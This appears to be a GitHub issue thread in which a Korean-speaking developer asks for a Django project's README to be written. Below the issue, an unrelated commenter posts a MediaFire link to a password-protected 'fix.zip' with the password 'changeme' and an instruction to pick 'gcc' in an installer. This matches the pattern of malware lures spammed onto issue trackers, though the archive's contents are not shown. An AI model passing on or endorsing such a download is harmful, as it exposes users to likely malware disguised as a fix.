### ISSUE TITLE
[Docs] Readme 문서화

### ISSUE THREAD

**Issue by Jihyun-Choi** [wanted-pre-onboarding-backend-django/feed-flow#33]
## 요구 사항
- 프로젝트의 Readme를 작성합니다.

## 작업 내용
- [ ] Readme 작성 

## 작업 마감일
- 24.08.26 (월)

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
